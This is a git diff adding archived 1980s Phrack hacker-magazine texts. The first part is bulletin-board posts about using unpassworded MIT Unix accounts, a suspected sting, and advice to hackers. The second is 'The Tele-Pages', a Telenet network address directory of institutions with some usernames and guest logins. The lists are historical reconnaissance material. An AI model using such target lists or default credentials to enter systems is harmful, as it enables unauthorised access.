+time since I played with that system, so I am unsure if the GUEST account still
+works, but if you use the WHO command you should see the GUEST account needed
+for applying for your own account.
+
+    -Phrost
+------------------------------------------------------------------------------
+Unix
+Name: Celtic Phrost
+Date: 5:35 pm  Mon Jan 20, 1986
+
+Ok, sorry, but I just remembered the application account, its: OPEN
+Gawd, I am glad I got that off my chest!
+
+    -(A relieved)Celtic Phrost.
+
+Also on that MIT computer Death listed, some other default accounts are:
+
+          LONG          MIKE          GREG          NEIL          DAN
+
+Get the rest yourself, and please people, LEAVE THEM UNPASSWORDED!
+
+------------------------------------------------------------------------------
+MIT
+Name: Druidic Death 12
+Date: 1:16 am  Fri Jan 23, 1987
+
+MIT is pretty cool.  If you haven't called yet, try it out.  Just PLEASE make
+sure you follow the little rules they asked us about!  If someone doesn't do
+something right the sysop leaves the gripe mail to me.  Check out my directory
+under the guest account just type "cd Dru".  Read the first file.
+
+------------------------------------------------------------------------------
+MIT
+Name: Ctrl C
+Date: 12:56 pm  Sat Jan 24, 1987
+
+MIT Un-Passworded Unix Accounts:   617-253-XXXX
+
+ALEX   BILL   GAMES   DAVE   GUEST   DAN   GREG   MIKE   LONG   NEIL  TOM   TED
+BRIAN     RODNEY    VRET     GENTILE    ROCKY    SPIKE     KEVIN    KRIS    TIM
+
+And PLEASE don't change the Passwords....
+
+         -=>Ctrl C<=-
+------------------------------------------------------------------------------
+MIT Again
+Name: Druidic Death
+Date: 1:00 pm  Wed Jan 28, 1987
+
+Ok people, MIT is pissed, someone hasn't been keeping the bargain and they
+aren't too thrilled about it.  There were only three things they asked us to
+do, and they were reasonable too.  All they wanted was for us to not compromise
+the security much more than we had already, logoff properly, not leave any
+processes going, and call only during non-business hours, and we would be able
+to use the GUEST accounts as much as we like.
+
+Someone got real nice and added themselves to the "daemon" group which is
+superusers only, the name was "celtic".  Gee, I wonder who that could have
+been?  I'm not pissed at anyone, but I'd like to keep on using MIT's computers,
+and they'd love for us to be on, but they're getting paranoid.  Whoever is
+calling besides me, be cool ok?  They even gave me a voice phone to chat with
+their sysops with.  How often do you see this happen?
+
+A little perturbed but not pissed...
+
+DRU'
+------------------------------------------------------------------------------
+Tsk, Celtic.
+Name: Evil Jay
+Date: 9:39 am  Thu Jan 29, 1987
+
+Well, personally I don't know why anyone would want to be a superuser on the
+system in question. Once you've been on once, there is really nothing that
+interesting to look at...but anyway.
+
+-EJ
+------------------------------------------------------------------------------
+In trouble again...
+Name: Celtic Phrost
+Date: 2:35 pm  Fri Jan 30, 1987
+
+...I was framed!! I did not add myself to any "daemon" group on any MIT UNIX.
+I did call once, and I must admit I did hang up without logging off, but this
+was due to a faulty program that would NOT allow me to break out of it, no
+matter what I tried.  I am sure that I didn't cause any damage by that.
+
+              -Phrost
+------------------------------------------------------------------------------
+Major Problems
+Name: Druidic Death
+Date: 12:20 pm  Sat Jan 31, 1987
+
+OK, major stuff going down.  Some unidentified individual logged into the
+Physics Dept's PDP11/34 at 617-253-XXXX and was drastically violating the
+"agreement" we had reached.  I was the one that made the "deal" with them.  And
+they even gave me a voice line to talk to them with.
+
+Well, one day I called the other Physics computer, the office AT and discovered
+that someone created an account in the superuser DAEMON group called "celtic".
+Well, I was contacted by Brian through a chat and he told me to call him.  Then
+he proceeded to nicely inform me that "due to unauthorized abuse of the system,
+the deal is off".
+
+He was cool about it and said he wished he didn't have to do that.  Then I
+called George, the guy that made the deal and he said that someone who said he
+was "Celtic Phrost" went on to the system and deleted nearly a year's worth of
+artificial intelligence data from the nuclear fission research base.
+
+Needless to say I was shocked.  I said that he can't believe that it was one of
+us, that as far as I knew everyone was keeping the deal.  Then he (quite pissed
+off) said that he wanted all of our names so he can report us to the FBI.  He
+called us fags, and all sorts of stuff, he was VERY!! [underline twice] PISSED!
+I don't blame him.  Actually I'm not blaming Celtic Phrost, it very easily
+could have been a frame up.
+
+But another thing is George thinks that Celtic Phrost and Druidic Death are one
+and the same, in other words, he thinks that *I* stabbed him in the back.
+Basically he just doesn't understand the way the hacker community operates.
+
+Well, the deal is off, they plan to prosecute whoever they can catch.  Since
+George is my best friend's brother I have not only lost a friend, but I'm
+likely to see some legal problems soon.  Also, I can forget about doing my
+graduate work at MIT.  Whoever did this damage to them, I hope you're happy.
+You really messed things up real nice for a lot of people.
+
+Celtic, I don't have any reason to believe you messed with them.  I also have
+no reason to think you didn't.  I'm not making an accusation against you, but
+WHOEVER did this, deserves to be shot as far as I'm concerned.  Until this data
+was lost, they were on the verge of harnessing a laser-lithium produced form of
+nuclear fission that would have been more efficient than using the standard
+hydrogen.  Well, back to the drawing board now.
+
+I realize that it's hard to believe that they would have data like this on this
+system.  But they were quite stupid in many other areas too.  Leaving the
+superuser account with no password??  Think about it.
+
+It's also possible that they were exaggerating.  But regardless, damage seems
+to have been done.
+
+------------------------------------------------------------------------------
+MIT
+Name: Phreakenstein
+Date: 1:31 am  Sun Feb 01, 1987
+
+Heck! I dunno, but whoever it was, I think, should let himself (the s00per
+K-rad elyte d00d he is) be known.
+
+I wasn't on MIT, but it was pretty dumb of MIT to even let Hackers on.  I
+wouldn't really worry though, they did let you on, and all you have to prove is
+that you had no reason to do it.
+----Phreak
+------------------------------------------------------------------------------
+I wonder...
+Name: Ax Murderer 15
+Date: 6:43 pm  Sun Feb 01, 1987
+
+I highly doubt that is was someone on this system.  Since this is an elite
+board, I think all the users are pretty decent and know right and wrong things
+to do.  Could be that one of the users on this system called another system and
+gave it out!??
+
+Ax Murderer
+------------------------------------------------------------------------------
+It was stupid
+Name: Druidic Death 12
+Date: 9:21 pm  Sun Feb 01, 1987
+
+It seems to me, or, what I gathered, they felt that there were going to be
+hackers on the system to begin with and that this way they could keep
+themselves basically safe.
+
+I doubt that it was Celtic Phrost, I don't think he'd be an asshole like that.
+But I can't say.  When I posted, I was pretty pissed about the whole deal. I've
+calmed down now.  Psychic Warlord said something to me voice the other day that
+made me stop and think.  What if this was a set up right from the start?  I
+mean, MIT won't give me specifics on just what supposedly happened, Celtic
+Phrost denies everything, and the biggest part of it is what George said to me.
+
+"We can forgive you for what you did to us if you'll promise to go straight and
+never do this again and just tell us who all of your friends are that are on
+the system".
+
+I didn't pay much attention to that remark at first, now I'm beginning to
+wonder...
+
+I, of course, didn't narc on anyone.  (Who do I know??? hehe)
+
+DRU'
+------------------------------------------------------------------------------
+Comments...
+Name: Delta-Master
+Date: 7:15 am  Mon Feb 02, 1987
+
+It wouldn't surprise me if it was some kind of setup, it's been done before.
+
+Delta-Master
+
+           [All posts in this article were taken from ShadowSpawn.]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Solution
+~~~~~~~~~~~~
+What more is there to say?  It definitely looks like there was a setup involved
+and it probably was not the first time and probably will not be the last time
+either.  So how can you protect yourself?
+
+As far as the bulletin boards go.  There is an unwritten rule somewhere that
+basically says that to be a good sysop, you first have to be a good user.  If
+the sysop of some mystery board is not someone you have seen around for a long
+time, then I would not call.  However, even if it is someone who has been
+around, references from someone you feel you can trust is a necessity.  It all
+boils down to the reliability of the information and the persons involved.
+
+When dealing with systems like the MIT Unix, remember, if its too good to be
+true then most likely there will be something that you are not being told.
+Who in their right mind is going to give free accounts to an important system
+with delicate information to a group of hackers?  Its crazy.
+
+This file will hopefully serve as an informative fresh look at an old game.  To
+me, even if the time I spent putting this article together helps out or saves
+only one phreak/hacker, I feel my job has been done successfully.
+
+:Knight Lightning
+
+                            "The Future Is Forever"
+
+                              The Phoenix Project
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
diff --git a/phrack21/4.txt b/phrack21/4.txt
new file mode 100644
index 0000000..ddafdf1
--- /dev/null
+++ b/phrack21/4.txt
@@ -0,0 +1,896 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 4 of 11
+
+        :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+        :.:.:                                                     :.:.:
+        :.:                     The Tele-Pages                      :.:
+        :.:                     ~~~~~~~~~~~~~~                      :.:
+        :.:                 Telenet Nodes/Addresses                 :.:
+        :.:                                                         :.:
+        :.:             Collected by Anonymous Sources              :.:
+        :.:                                                         :.:
+        :.:    From Europe, United Kingdom, and The Middle East     :.:
+        :.:                                                         :.:
+        :.:         Imported into the USA by Jester Sluggo          :.:
+        :.:                                                         :.:
+        :.:                 Special Thanks To Sefi                  :.:
+        :.:                                                         :.:
+        :.:                     October 7, 1988                     :.:
+        :.:.:                                                     :.:.:
+        :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+
+
+This file contains the list of Telenet nodes/addresses you use when you are
+outside of USA/Canada (Example: United Kingdom, Europe, or the Middle East).
+Very much 'thanks' goes towards the wonderful, people who worked
+infinite-months on this.                                           -- Sluggo !!
+
+      (* = Passwords that have been removed for this presentation. - KL)
+_____________________________________________________________________________
+              |             |                 |           |  |  |  |    |    |
+Name          |Number       |Ext.|User Name   |Password   |KN|DN|NO|Test|Land|
+==============================================================================
+Us Telemail   |031102020014 |    |KKCHUNG     |********   |  |XX|  |    | US |
+Uni Brighton  |023427050015 |    |GUEST       |*******    |  |XX|  |    | UK |
+Sysnet Wien   |023224221142 |MAI |Gast        |****       |  |XX|  |    | AT |
+              |023424126010604   |,5020015    |*****/*****|  |XX|  |    | UK |
+              |026243221093001   |U 5Jm11964,|*****      |  |XX|  |    |    |
+              |03422351919169    |,10404000   |******( *x)|  |XX|  |    |    |
+Z E V         |022847911118 |    |EPSON       |*****      |  |XX|  |    | CH |
+Altos         | 45890040004 |    |Woodo       |****(***** |  |XX|  |    | DE |
+Mehlbox HAM   | 45400090184 |    |Mike        |******     |  |XX|  |    | DE |
+E C H O       |  0270448112 |    |UK85041D    |********   |XX|  |  |    | NE |
+Eis - Vax     |???????????? |    |????????????|???????????|??|??|??|????|????|
+B I X         |031060057878 |    |Rupert      |-----------|  |  |  |    | US |
+C.L.I.N.C.H.  |  4440009031 |    |Gast        |****       |  |  |  |    | DE |
+              | 45690090125 |    |KO/VMUTIL   |******     |  |XX|  |    | DE |
+E X C O N     |022849911102001   |Call 130    |***        |  |XX|  |    | CH |
+              |023422351919169   |,49000001   |*******/****  |XX|  |    | UK |
+R M I  Aachen | 45241090832 |    |Guest (Menue 20.3) *****|  |  |  |    | DE |
+Markt & Tech. | 45890010006 |    |EMERY04     |???????????|XX|  |  |    | DE |
+Markt & Tech. | 45890010006 |    |EMERY05     |???????????|  |XX|  |    | DE |
+K D D Vax     |  0440820023 |    |Conf        |****       |  |XX|  |    | JA |
+Emery ADO     | 03106907626 |    |CICS4\D     |*****      |  |  |  |    | US |
+Euronet       | 023421920100513  |Tikatom     |           |  |XX|  |    | NE |
+Netztest DE   | 4590049002  |ECHO|            |           |  |  |  |    | DE |
+Netztest AU   | 05053210001 |    |            |           |  |  |  |    | AU |
+The Source    |0311030100038|    |Jinatari    |*********  |  |  |  |DEMO| US |
+The Source    |0311030100038|    |Josh1       |********   |  |XX|  |    | US |
+Delphi        |0311061703088|    |------------|-----------|  |  |  |    | US |
+Nuclear Res.  | 03110500061 |    |Bill        |*******    |  |XX|  |    | US |
+E.S.A.        |023421920115600   |MAR15540    |           |  |XX|  |    | NE |
+Hazylab       | 45400030201 |    |User        |****       |  |XX|  |    | DE |
+              |023421880100300   |Mudguest    |********   |  |XX|  |18-8| NE |
+              | 4511042301  |    |zzve099/zzueb|******/*******  |  |    | DE |
+Datapac       | 030292100086|    |------------|-----------|  |  |  |    | CA |
+Dallas        | 0310600787  |    |------------|-----------|  |  |  |    | US |
+A M P         |023422020010700   |Use Demo Account        |  |  |  |    | UK |
+Canada        |0302067100901|    |------------|-----------|  |  |  |    | CA |
+Telenet       |0311020200141|    |Telemailintl|**** ******|  |XX|  |    | US |
+A D P Network |034219200118 |    |1300-7777   |***        |  |XX|  |    | NE |
+Hostess       |023421920101013   |Euonet      |*****      |  |XX|  |    | NE |
+G D  P T T    |02284410906  |    |mit \G Laeuten NUA *****|  |  |  |    | IT |
+Tymnet        |4561040250   |    |            |           |  |  |  |    | DE |
+Autonet       |45611040076  |    |            |           |  |  |  |    | DE |
+PSS DOC       |02421920101013    |            |           |  |  |  |    |    |
+Midnet Gatew. |0234260227227|    |            |           |  |  |  |    | UK |
+NUMAC         |0234263259159|    |            |           |  |  |  |    | UK |
+Sharp Comp.   |0234219200203|    |,IPSHIP     |           |  |  |  |    | UK |
+College LON   |0234219200333|    |,EUCLID     |           |  |  |  |    | UK |
+Brit. TELECOM |023421920101030   |,TSTB       |           |  |  |  |    | UK |
+Phis. Labtory |0234219709111|    |,NPL1       |           |  |  |  |    | UK |
+Phis. Labtory |0234219709210|    |,NPL2       |           |  |  |  |    | UK |
+Queen Marry C.|023419806160 |    |,QMC        |           |  |  |  |    | UK |
+Atom.Ener.Res.|0234223519111|    |,AERE       |           |  |  |  |    | UK |
+Database      |023422351911198   |,DAADA      |           |  |  |  |    | UK |
+Uni Leverpool |0234251248248|    |,LIVE       |           |  |  |  |    | UK |
+Space Research|0234290524242|    |,RSRERADIO  |           |  |  |  |    | UK |
+Brit. Oxig.   |0234293212212|    |,BOC        |           |  |  |  |    | UK |
+A M D A H L   |0240515330   |    |,QZIBQZ     |           |  |  |  |    |    |
+Cyber         |02405015320  |    |,OZCBQZ     |           |  |  |  |    |    |
+H M I         |    45300217 |    |,HMI        |           |  |  |  |    | DE |
+S W           |02405020328  |    |,QZXAQZ  via reverse Pad|  |  |  |    |    |
+PSS Mail Serv |023421920105 |    |            |           |  |  |  |    | UK |
+C E R N       |022846811405 |    |            |           |  |  |  |    |    |
+W A X Bank FRA|  45611040187|    |????????????|???????????|  |  |  |    | DE |
+Uni Bochum    |  45611040240|    |            |           |  |  |  |    | DE |
+Uni Berlin    |  4530040023 |    |            |           |  |  |  |    | DE |
+Teleprint SBR |  4568100010 |    |            |           |  |  |  |    | DE |
+Max Planc MUC |  45890040220|    |            |           |  |  |  |    | DE |
+B B D A       |02062221006  |    |            |           |  |  |  |    |    |
+Dialne        |0234212300120|    |            |           |  |  |  |    | UK |
+Euclid    LON |0234219200333|    |            |           |  |  |  |    | UK |
+Decates       | 44615440371 |    |            |           |  |  |  |    | DE |
+R M I Aachen  | 44241040341 |    |            |           |  |  |  |    | DE |
+N P L I       |0234219709111|    |            |           |  |  |  |    | UK |
+T S T B       |023421920101030   |            |           |  |  |  |    | UK |
+U C L         |0234219200300|    |            |           |  |  |  |    | UK |
+Dimdi         |45221040006  |    |,DA         |           |  |  |  |    | DE |
+Dimdi         |45221040104  |    |,DA         |           |  |  |  |    | DE |
+Emery     STR |4471149236   |    |            |           |  |  |  |    | DE |
+              |07222211100171    |            |           |  |  |  |    |    |
+              |43221093001  |    |U5JM11964,*****        |  |  |  |    | DE |
+              |02222632004  |    |ask reply for some NUA's|  |  |  |    | IT |
+              |03106001977  |    |            |           |  |  |  |    | US |
+              |023520014300165   |            |           |  |  |  |    | UK |
+______________|_____________|____|____________|___________|__|__|__|____|____|
+
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+    00000 15000006      FTP FOR ECSVAX
+    00000 15000019      FTP FOR EEVAX
+    00000 15000034      WEST OF SCOT. COLL. OF AGRIC.
+    00000 15000036      FTP FOR CSTVAX
+    00000 1500100750    FTP FOR ITS63A
+    00000 1500101570    IT SCHOOL 63/40
+    00000 16000002      EMAS FRONT END
+
+========================
+=   AUS - Australia    =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+AUS 05052 28621000      ANGLO/AUSTRALIAN OBSERVATORY
+AUS 05052 28621001      CSIRO RADIO-PHYSICS
+AUS 05052 28621001      FTP FOR EPPING
+AUS 05052 82620000      FTP FOR AUSTEK
+AUS 05052 82620000      VAX IN SIDNEY, AUSTRALIA
+AUS 05053 210003        MIDAS FOX TEST
+
+========================
+=   CH - Switzerland   =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+CH  02284 64110115      DATA.STAR
+CH  02284 6811405
+CH  02284 681140510,LO  PACX2
+CH  02284 6911003       NOS.CYBER,CIA0543,GUEST
+CH  02284 79110650      KOMETH.TELEPAC
+CH  02284 7911118       ZEV
+CH  02284 64110110      DATASTAR
+CH  02284 68113150      MANAGEMENT JOINT TRUST
+
+========================
+=   D - West Germany   =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+D   02624 4890049130
+D   02624 5211040026
+D   02624 5211040026    PRIMENET
+D   02624 5221040002
+D   02624 5221040006    MEDICAL DOCS,COLOGNE
+D   02624 5221040104    GERMAN MED. INST., COLOGNE
+D   02624 5228040187    PI.BONN
+D   02624 5300021713
+D   02624 5400030029
+D   02624 5400030035
+D   02624 5400030041
+D   02624 5400030046
+D   02624 5400030071
+D   02624 5400030090    (cierr 1402)
+D   02624 5400030104
+D   02624 5400030105
+D   02624 5400030110    HOST
+D   02624 5400030113    (cierr 1402)
+D   02624 5400030138
+D   02624 5400030150
+D   02624 5400030158
+D   02624 5400030175
+D   02624 5400030187    E2000 HAMBURG VAX
+D   02624 5400030201    HASYLAB-VAX
+D   02624 5400030202    HERA MAGNET MEASUREMENT VAX 750
+D   02624 5400030215
+D   02624 5400030259
+D   02624 5400030261
+D   02624 5400030296    DFH2001I
+D   02624 5400030502
+D   02624 5400030519
+D   02624 5400030566    DFH2001I
+D   02624 5400030578    PRIMENET 20.0.4 DREHH
+D   02624 5400090184
+D   02624 5400091110    DT.MAILBOX
+D   02624 5611040009    CENTRE FOR INFO AND DOC,GERMANY
+D   02624 5615140282
+D   02624 5621040000    TELEBOX
+D   02624 5621040000    TELEBOX
+D   02624 5621040014    ACF/VTAM
+D   02624 5621040025    OEVA
+D   02624 5621040026    HOST
+D   02624 5621040027    BASF/FER.VAX 8600
+D   02624 5621040508    VCON0.BASF.A6
+D   02624 5621040516    CN01
+D   02624 5621040532
+D   02624 5621040580    DYNAPAC MULTI-PAD.25
+D   02624 5621040581    DYNAPAC MULTI-PAD.25
+D   02624 5621040582
+D   02624 5724740001    GERMAN CENTRE FOR TECH.
+D   02624 5890040004    ACS.MUNICH
+D   02624 5890040081    NOS.SW.SYS.MUNICH
+D   02624 5890040185
+D   02624 5890040207    DATABASE OTTOBRUNN
+D   02624 5890040207
+D   02624 5890040220    HOST
+D   02624 5890040221    HOST
+D   02624 5890040225    QNTEC.MUNICH
+D   02624 5890040262    BDS.UNIX
+D   02624 5890040266
+D   02624 5890040281    DATUS.PAD
+D   02624 5890040510
+D   02624 5890040522    PLESSEY.SEMICOND.VAX
+D   02624 5890040542
+D   02624 589009012
+D   02624 5913111       ERLANGEN CYBER 173, NURNBURG
+
+========================
+=   F - France         =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+F   02080 34020258
+F   02080 7802016901
+F   02080 38020676      ILL DIVA
+F   02080 91040047      SACLAY, FRANCE
+F   02080 91190258      LURE SYNCHROTRON SOURCE
+
+========================
+=   GB - Great Britian =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+GB  02342 12300120      D.I.SERV.
+GB  02342 12301186
+GB  02342 1300011
+GB  02342 1440012
+GB  02342 15710104
+GB  02342 19200118      AUTONET
+GB  02342 19200146
+GB  02342 19200154
+GB  02342 19200190      PERG.INFOLN.
+GB  02342 19200203
+GB  02342 19200222
+GB  02342 19200300      UNI.LONDON
+GB  02342 19200304
+GB  02342 19200394      SIANET
+GB  02342 19200871
+GB  02342 19201002
+GB  02342 1920100515    HOSTESS
+GB  02342 1920100615
+GB  02342 192010100513
+GB  02342 1920101013
+GB  02342 1920101030
+GB  02342 19709111
+GB  02342 206411411     UNI.ESSEX
+GB  02342 20641141      UNI.ESSEX
+GB  02342 22236236
+GB  02342 2271511       ---,GUEST,FRIEND (CALL PIP)
+GB  02342 2790014302    ALCATEL
+GB  02342 12080105
+GB  02342 12300120      DIALOG VIA DIALNET IN LONDON
+GB  02342 123002920
+GB  02342 12301281      ONE TO ONE COMMS
+GB  02342 13900101      ALVEY MAIL FACILITY
+GB  02342 1390010150    ALVEY MAIL SYS FTP
+GB  02342 19200100      UNI OF LONDON COMPUTING CENTRE
+GB  02342 19200171
+GB  02342 19200220      BRITISH LIBRARY ON-LINE SYSTEM
+GB  02342 19200300      UNIVERSITY COLLEGE, LONDON
+GB  02342 19200394      COMPUTER SERVICES, LONDON
+GB  02342 1920100513    BRITISH TELECOM SERVICES
+GB  02342 1920100620    P. ON-LINE BILLING SERVICE
+GB  02342 1920102517
+GB  02342 20641141      UNI OF ESSEX FTP
+GB  02342 2223616300    CARDIFF UNIVERSITY MULTICS
+GB  02342 27200110      GEAC 8000 ITI
+GB  02342 27200112      HEWLETT PACKARD LABS, BRISTOL
+GB  02342 31300101      PRIME OFFICE, EDINBURGH
+GB  02342 31300102      FORESTRY COMMISSION FTP
+GB  02342 31300105      LATTICE LOGIC LTD
+GB  02342 31300107
+GB  02342 34417117      ICL BRACKNELL
+GB  02342 41200107
+GB  02342 4620010243    ICL WEST GORTON 'B' SERVICE
+GB  02342 4620010248    ICL WEST GORTON 'X' SERVICE
+GB  02342 4620010277    FTP FOR ICL WEST GORTON PERQ
+GB  02342 4620010277    ICL WEST GORTON PERQ
+GB  02342 46240240      ICL KIDSGROVE
+GB  02342 53300124      LEICESTER
+GB  02342 5820010604    AGRENET CPSE
+GB  02342 60227227      UNI OF LEICESTER FTP
+GB  02342 61600133      IBM - SALE
+GB  02342 61600133      IBM SALE FTP
+GB  02342 61643365      ICLBRA
+GB  02342 6164336543    ICL WEST GORTON 'B' SERVICE
+GB  02342 6164336548    ICL WEST GORTON 'X' SERVICE
+GB  02342 6164336577    FTP FOR ICL WEST GORTON PERQ
+GB  02342 6164336577    ICL WEST GORTON PERQ
+GB  02342 64200136      PRIMENET
+GB  02342 70712217      HATFIELD POLYTECHNIC
+GB  02342 75312212      BRITISH OXYGEN
+GB  02342 75312212      THE WORLD REPORTER
+GB  02342 78228282      ICL LETCHWORTH
+GB  02342 78228288      ICL LETCHWORTH
+GB  02342 90468168
+GB  02342 90840111      SCICON, SOUTH ENGLAND
+GB  02342 93765265      BRITISH LIBRARY LENDING DIVI.
+
+========================
+=   I - Italy          =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+I   02222 620021        EUROPEAN SPACE AGENCY, ROME
+
+========================
+=   IRL - Ireland      =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+IRL 02724 31540002      EUROKOM (UNIV COLLEGE DUBLIN)
+IRL 02724 3154000803
+IRL 02724 3154000803    IRL.HEA.TCD.DEC20 (TOPS-20)
+IRL 02724 3159000630
+
+========================
+=   N - Norway         =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+N   02422 11000001      DEC-10, OSLO UNI
+
+========================
+=   NL - Netherlands   =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+NL  02041 294002        DUPHAR WEESP,HOLLAND
+
+========================
+=   S - Sweden         =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+S   02402 00310228      UNI.LUND
+S   02405 015503        GOTTENBURG, SWEDEN
+S   02405 02032832      ODEN, SWEDEN
+
+========================
+=   SF - Finland       =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+SF  02442 02007         CANDE IN FINLAND
+SF  02442 03008         VAX 11/750 IN FINLAND
+========================
+=   USA = USA          =
+========================
+CTR NUA                 NAME,UID,PW,REMARK
+=========================================================================
+USA 03020 58700900      DATAPAC
+USA 03020 60100010      UNI.ALBERTA
+USA 03106 0050
+USA 03106,DELPHI        TYMNET
+USA 03110 2020014275
+USA 03110 20423
+USA 03110 4150002000    D.I.SERV.
+USA 03110 60300020      COL.DARTMOUTH
+USA 03106               GATEWAYS
+USA 03106 000000        Unknown
+USA 03106 000023
+USA 03106 000032
+USA 03106 000034
+USA 03106 000050        NLM MIS bsd unix
+USA 03106 000060
+USA 03106 000065
+USA 03106 000066        BCS ** to be investigated **
+USA 03106 000071
+USA 03106 000081        COMPUTONE ** to be investigated **
+USA 03106 000093
+USA 03106 000096        REMOTE COMPUTING
+USA 03106 000098        LOCKHEED DATAPLAN
+USA 03106 000101        SIO
+USA 03106 000113        1=LINK SYS
+                        3=BANK OF USA,ABACIS,DIRECTOR)
+USA 03106 000155
+USA 03106 000173        TYMNET/CODAN NET. Inter-link
+USA 03106 000179        LBL
+USA 03106 000188
+USA 03106 000210
+USA 03106 000227
+USA 03106 000241        HOST    A,4 BAIFS  BANK OF AMERICA
+                                S,3 SFDCS1
+USA 03106 000249
+USA 03106 000280        HONEYWELL MPL
+USA 03106 000289        ROSS SYSTEM (32,26,2,3,12,20,21)
+                        7,5,17,18,47,51,A - unknown VAX systems
+                                    14,15 - RSTS ROSS SYSTEMS
+                            9,43,44,45,48 - MICRO VMS VAX
+USA 03106 000307        INFOMEDIA SERVICE CENTRE ONE
+USA 03106 000315
+USA 03106 000327
+USA 03106 000331        (VM/370 system)
+USA 03106 000377        MONSANTO AD RESEARCH PRODUCTION
+                        APPLICATION NETWORK
+USA 03106 000379
+USA 03106 000401        TMCS PUBLIC NETWORK
+USA 03106 000411        TYMNET/BOSTON/TNS-PK1 interlink
+USA 03106 000423        CORPORATE COMPUTER SERVICES
+USA 03106 000424        (link to 4 VM/370 systems)
+USA 03106 000428        AAMNET
+USA 03106 000439        MIS 2 (cierr 1402)
+USA 03106 000463        SIGNETICS VM/370
+USA 03106 000464
+USA 03106 000496
+USA 03106 000497        UBS COMPUTER SYSTEMS (host)
+USA 03106 000498
+USA 03106 000515        ONTYME II
+USA 03106 000581
+USA 03106 000585        C/C/M
+USA 03106 000619        SPNB VM/370
+USA 03106 000632        TYMNET/TRWNET inter-link
+USA 03106 000633        PUBLIC TYMNET/TRWNET INTERLINK
+USA 03106 000636        LINK TO TRAC SYSTEMS (over one 120 terminal)
+USA 03106 000646
+USA 03106 000664
+USA 03106 000674
+USA 03106 000685        MTS-A RESEARCH (HOST) 10 - TOPS-20,
+                                              12 - UNKNOWN
+                                              14 - UNKNOWN,
+                                              20 - MTS(C) TOPS-20
+                                              30 - MTS(F) TOPS-20,
+                                              32 - UNKNOWN
+USA 03106 000704        TYMNET-CUP(704)/DUBB-NTS(4) inter-link
+USA 03106 000715        TYMNET TEST system
+USA 03106 000729        (VM/370 system)
+USA 03106 000731
+USA 03106 000742        LADC L66A
+USA 03106 000755        CORPORATE COMPUTER SERVICES
+USA 03106 000759
+USA 03106 000760        DEC host Solar Cae/Cam
+USA 03106 000761        DOJ host
+USA 03106 000788        TYMNET-6754/McGRAWHILL inter-link
+USA 03106 000793        J&J HOST
+USA 03106 000798
+USA 03106 000800        link to: CSG VAX, CYBER 815, SB1,
+                                 SB2, SB3, SCN-NET
+USA 03106 000821
+USA 03106 000832        ONTYME II
+USA 03106 000842
+USA 03106 000850        CISL SERVICE MACHINE
+USA 03106 000859
+USA 03106 000871
+USA 03106 000898        P&W
+USA 03106 000932
+USA 03106 001010        DITYMNET01
+USA 03106 001024
+USA 03106 001030
+USA 03106 001036        IBM1
+USA 03106 001042        IDC/370
+USA 03106 001043
+USA 03106 001053        STRATEGIC INFORMATION
+USA 03106 001056        SYNTEX TIMESHARING
+USA 03106 001105        HOST SGNY  1 - VAX II PRODUCTIONS SYSTEM
+                                   3 - VAX II PRODUCTIONS SYSTEM
+                                   (tried to 5)
+USA 03106 001110
+USA 03106 001134        COMPUSERVE
+USA 03106 001141        MESSAGE SERVICE SYSTEM (FOX)
+USA 03106 001143
+USA 03106 001152
+USA 03106 001158        TYMNET USER SERVICE
+USA 03106 001227        ACF2
+USA 03106 001288
+USA 03106 001304        ONTYME II
+USA 03106 001309
+USA 03106 001316
+USA 03106 001320
+USA 03106 001328
+USA 03106 001330        MULTICS, HVN 862-3642
+USA 03106 001341
+USA 03106 001358
+USA 03106 001361        THOMPSON COMPONENTS-MOSTEK CORPORATION
+USA 03106 001383        HOST 1,A - TILLINGHAST BENEFITS T.SHAR.SYS.
+                             2,C - TILLINGHAST INSURANCE T.SHAR.SYS.
+                             4,D - OUTDIALS
+                             6   - TILLINGHAST VAX 8600
+                             (tried to 10,G)
+USA 03106 001391        SOCAL
+USA 03106 001399        C80
+USA 03106 001400        TMCS PUBLIC NETWORK
+USA 03106 001410        DATALYNX/3274 TERMINAL
+USA 03106 001417
+USA 03106 001434        (host system) - double digits
+                        VM is active, tried  to BZ
+USA 03106 001438
+USA 03106 001443
+USA 03106 001467        STN INTERNATIONAL
+USA 03106 001482        FNOC DDS
+USA 03106 001483        ADR HEADQUARTERS
+USA 03106 001487
+USA 03106 001488        (cierr 1402)
+USA 03106 001502        ARGON NATIONAL LAB
+USA 03106 001508        IDC/370
+USA 03106 001509
+USA 03106 001514        (HOST) DC-10
+USA 03106 001519
+USA 03106 001533        SBS DATA CENTRE
+USA 03106 001557
+USA 03106 001560
+USA 03106 001572        PRIMECON NETWORK (system 50)
+USA 03106 001578
+USA 03106 001589
+USA 03106 001594        CON138
+USA 03106 001611
+USA 03106 001612        TYMNET-NEWARK/TSN-MRI inter-link
+USA 03106 001616        TYMNET-5027/McGRAW HILL inter-link
+USA 03106 001624
+USA 03106 001642        Host, A - CORNELLA (system choices displayed)
+USA 03106 001659        BYTE INFORMATIO EXCHANGE,GUEST,GUEST
+USA 03106 001663        PEOPLE LINK
+USA 03106 001665
+USA 03106 001709
+USA 03106 001715        TYMNET/BOFANET inter-link
+USA 03106 001727
+USA 03106 001757
+USA 03106 001763
+USA 03106 001765
+USA 03106 001766        PRIMENET
